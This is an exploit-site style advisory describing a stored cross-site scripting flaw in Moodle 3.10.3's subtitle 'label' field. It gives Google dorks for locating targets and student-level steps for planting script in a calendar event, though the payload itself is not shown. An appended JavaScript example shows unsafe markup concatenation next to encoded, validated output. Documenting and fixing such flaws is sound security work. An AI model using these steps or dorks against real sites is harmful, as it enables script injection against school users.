Moodle 3.10.3 label persistent cross site scripting Vulnerability / Exploit
Exploits / Vulnerability Discovered: 2021-03-26 | Type: webapps | Platform: php
This exploit / vulnerability (Moodle 3.10.3 label persistent cross site scripting) is for educational purposes only; if you use it, you do so at your own risk!
# Exploit Title: Moodle 3.10.3 - 'label' Persistent Cross Site Scripting
# Date: 25.03.2021
# Author: Vincent666 ibn Winnie
# Software Link: https://moodle.org/
# Tested on: Windows 10
# Web Browser: Mozilla Firefox
# Google Dorks: inurl:/lib/editor/atto/plugins/managefiles/ or calendar/view.php?view=month
Choose a role: Student (example)
Open the calendar:
https://school.localhost/calendar/view.php?view=month
Create a new event:
Example:
Event Title: "Test"
Description: choose Insert Video File and choose Video:
Video Source URL: you can paste a video link from YouTube
Then open Subtitles and Captions:
Subtitle track URL: use a video link from YouTube
Field Label: here we can use XSS code:
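The steps above put user-supplied text into the label attribute of a subtitle track. As an added example (not part of the original advisory, and not Moodle's or Atto's code), this JavaScript contrasts concatenating the label into markup with validating the URL and encoding each attribute value. All function names, the sample label and the subtitle path are constructed for illustration.

```javascript
'use strict';
// Added illustration: every name here is hypothetical, not Moodle/Atto code.

// Constructed sample input: a harmless label that contains markup characters.
const SAMPLE_SRC = 'https://school.localhost/subs/en.vtt';
const SAMPLE_LABEL = 'English "CC" <i>draft</i>';

// Encode the characters that can close an attribute value or open a tag.
function escapeAttr(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Accept only absolute http(s) URLs for the subtitle track source.
function safeTrackUrl(raw) {
  try {
    const u = new URL(String(raw));
    return (u.protocol === 'http:' || u.protocol === 'https:') ? u.href : null;
  } catch (e) {
    return null;
  }
}

// Unsafe pattern: field values are concatenated into the markup unchanged.
function renderTrackUnsafe(src, label) {
  return '<track kind="subtitles" src="' + src + '" label="' + label + '">';
}

// Hardened pattern: validate the URL and encode every attribute value.
function renderTrackSafe(src, label) {
  const url = safeTrackUrl(src);
  if (url === null) return '';
  return '<track kind="subtitles" src="' + escapeAttr(url) +
    '" label="' + escapeAttr(label) + '">';
}

// Count tag openings; a single <track> element must yield exactly one.
function countTagOpenings(html) {
  return (html.match(/<[a-zA-Z]/g) || []).length;
}

console.log(countTagOpenings(renderTrackUnsafe(SAMPLE_SRC, SAMPLE_LABEL)));
console.log(renderTrackSafe(SAMPLE_SRC, SAMPLE_LABEL));
```

The same encoding has to be applied on the server when stored event descriptions are rendered, because a client-side editor check can be bypassed.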